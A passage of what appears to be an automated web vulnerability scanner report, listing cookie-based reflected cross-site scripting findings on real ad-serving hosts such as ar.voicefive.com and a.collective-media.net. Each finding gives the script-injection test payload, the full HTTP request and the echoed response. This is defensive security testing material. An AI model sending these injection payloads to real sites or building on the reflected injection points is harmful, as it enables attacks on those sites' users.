Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;net=uol;ord=1655200;env=ifr;ord1=605483;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3e5bd7'%3balert(1)//464e19fd8c7; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.1029. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 94aba<script>alert(1)</script>18a5cd25845 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=194aba<script>alert(1)</script>18a5cd25845; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:23 2011&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26393

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&', "BMX_3PC": '194aba<script>alert(1)</script>18a5cd25845', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|h
...[SNIP]...

4.1030. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 98d98<script>alert(1)</script>11107b5acab was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C98d98<script>alert(1)</script>11107b5acab

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:23 2011&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26393

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
1580": 'exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C98d98<script>alert(1)</script>11107b5acab' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

4.1031. http://ar.voicefive.com/bmx3/broker.pli [UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload ef153<script>alert(1)</script>1aed363857 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 27 13:24:45 2011&prad=58087454&arc=40401349&; UID=1d29d89e-72.246.30.75-1294456810ef153<script>alert(1)</script>1aed363857

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:23 2011&prad=58087481&arc=40401349&; expires=Thu 28-Apr-2011 16:37:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296232643; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26297

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401349",Location:CO
...[SNIP]...
);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810ef153<script>alert(1)</script>1aed363857', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 2
...[SNIP]...

4.1032. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 4c0e5<script>alert(1)</script>8e340961025 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p45555483&PRAd=59007464&AR_C=38601779\ HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296264969%2E946%2Cwait%2D%3E10000%2C; UID=1d29d89e-72.246.30.75-1294456810; ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&4c0e5<script>alert(1)</script>8e340961025; ar_p85001580=exp=23&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 01:36:09 2011&prad=58087449&arc=40400793&;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 29 Jan 2011 05:21:01 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: ar_p45555483=exp=2&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 05:21:01 2011&4c0e5<script>alert(1)</script>8e340961025=&prad=59007464&arc=38601779%5C&; expires=Fri 29-Apr-2011 05:21:01 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27721

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"59007464",Pid:"p45555483",Arc:"38601779\",Location:C
...[SNIP]...
: '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296264969%2E946%2Cwait%2D%3E10000%2C', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&4c0e5<script>alert(1)</script>8e340961025', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.co
...[SNIP]...

4.1033. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 19ab0<script>alert(1)</script>eb1af63e5fc was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&19ab0<script>alert(1)</script>eb1af63e5fc; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:22 2011&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26393

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&19ab0<script>alert(1)</script>eb1af63e5fc', "ar_p85001580": 'exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%
...[SNIP]...

4.1034. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 23425<script>alert(1)</script>3fbe48c0625 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&23425<script>alert(1)</script>3fbe48c0625; ar_p85001580=exp=14&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 00:14:19 2011&prad=58087454&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296260059%2E936%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 29 Jan 2011 01:56:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=15&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 01:56:36 2011&prad=58087449&arc=39969205&; expires=Fri 29-Apr-2011 01:56:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26513

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087449",Pid:"p85001580",Arc:"39969205",Location:CO
...[SNIP]...
: '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296260059%2E936%2Cwait%2D%3E10000%2C', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&23425<script>alert(1)</script>3fbe48c0625' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

4.1035. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload be4b9<script>alert(1)</script>72311a1bd07 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&be4b9<script>alert(1)</script>72311a1bd07; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:22 2011&be4b9<script>alert(1)</script>72311a1bd07=&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26393

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&be4b9<script>alert(1)</script>72311a1bd07', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.co
...[SNIP]...

4.1036. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [FFpb cookie] previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1aa4b(a)1243ae578bf was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
